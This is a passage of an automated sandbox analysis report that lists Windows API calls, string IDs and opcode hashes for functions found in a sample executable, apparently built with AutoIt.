                                                    • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                    • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                    • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                    • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                    APIs
                                                    • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                    • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                    • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                    • ExitThread.KERNEL32 ref: 004151ED
                                                    • __freefls@4.LIBCMT ref: 00415209
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                    • String ID:
                                                    • API String ID: 442100245-0
                                                    • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                    • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                    • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                    • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                    APIs
                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                    • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                    • _wcslen.LIBCMT ref: 0045F94A
                                                    • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                    • String ID: 0
                                                    • API String ID: 621800784-4108050209
                                                    • Opcode ID: 27a8d1a391d44048803f5840ac21889e260530b75c30abb05853da563ac7c2fc
                                                    • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                    • Opcode Fuzzy Hash: 27a8d1a391d44048803f5840ac21889e260530b75c30abb05853da563ac7c2fc
                                                    • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • SetErrorMode.KERNEL32 ref: 004781CE
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                    • SetErrorMode.KERNEL32(?), ref: 00478270
                                                    • SetErrorMode.KERNEL32(?), ref: 00478340
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                    • String ID: \VH
                                                    • API String ID: 3884216118-234962358
                                                    • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                    • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                    • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                    • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                    • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                    • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressFreeLoadProc
                                                    • String ID: AU3_GetPluginDetails$#v
                                                    • API String ID: 145871493-3662034293
                                                    • Opcode ID: 1a8b951876d27d2db6043d1d88fc2ce87b629190fe6f898e4756a9c282465399
                                                    • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                    • Opcode Fuzzy Hash: 1a8b951876d27d2db6043d1d88fc2ce87b629190fe6f898e4756a9c282465399
                                                    • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                    • IsMenu.USER32(?), ref: 0044854D
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                    • DrawMenuBar.USER32 ref: 004485AF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$DrawInfoInsert
                                                    • String ID: 0
                                                    • API String ID: 3076010158-4108050209
                                                    • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                    • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                    • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                    • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                    • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$_memmove_wcslen
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 1589278365-1403004172
                                                    • Opcode ID: c22c1c8709533b42ddd55d3d4fc5b1188074a7fef71f847cac6d68069895a192
                                                    • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                    • Opcode Fuzzy Hash: c22c1c8709533b42ddd55d3d4fc5b1188074a7fef71f847cac6d68069895a192
                                                    • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Handle
                                                    • String ID: nul
                                                    • API String ID: 2519475695-2873401336
                                                    • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                    • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                    • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                    • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Handle
                                                    • String ID: nul
                                                    • API String ID: 2519475695-2873401336
                                                    • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                    • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                    • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                    • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                    APIs
                                                    • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    • _wcsncpy.LIBCMT ref: 00401C41
                                                    • _wcscpy.LIBCMT ref: 00401C5D
                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                    • String ID: Line:
                                                    • API String ID: 1874344091-1585850449
                                                    • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                    • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                    • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                    • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: SysAnimate32
                                                    • API String ID: 0-1011021900
                                                    • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                    • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                    • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                    • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                    APIs
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                      • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                      • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                      • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                      • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                    • GetFocus.USER32 ref: 0046157B
                                                      • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                      • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                    • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                    • __swprintf.LIBCMT ref: 00461608
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                    • String ID: %s%d
                                                    • API String ID: 2645982514-1110647743
                                                    • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                    • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                    • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                    • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                    • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                    • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                    • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                    APIs
                                                    • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                    • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                    • String ID:
                                                    • API String ID: 3488606520-0
                                                    • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                    • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                    • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                    • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ConnectRegistry_memmove_wcslen
                                                    • String ID:
                                                    • API String ID: 15295421-0
                                                    • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                    • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                    • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                    • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 004563A6
                                                    • ScreenToClient.USER32(?,?), ref: 004563C3
                                                    • GetAsyncKeyState.USER32(?), ref: 00456400
                                                    • GetAsyncKeyState.USER32(?), ref: 00456410
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
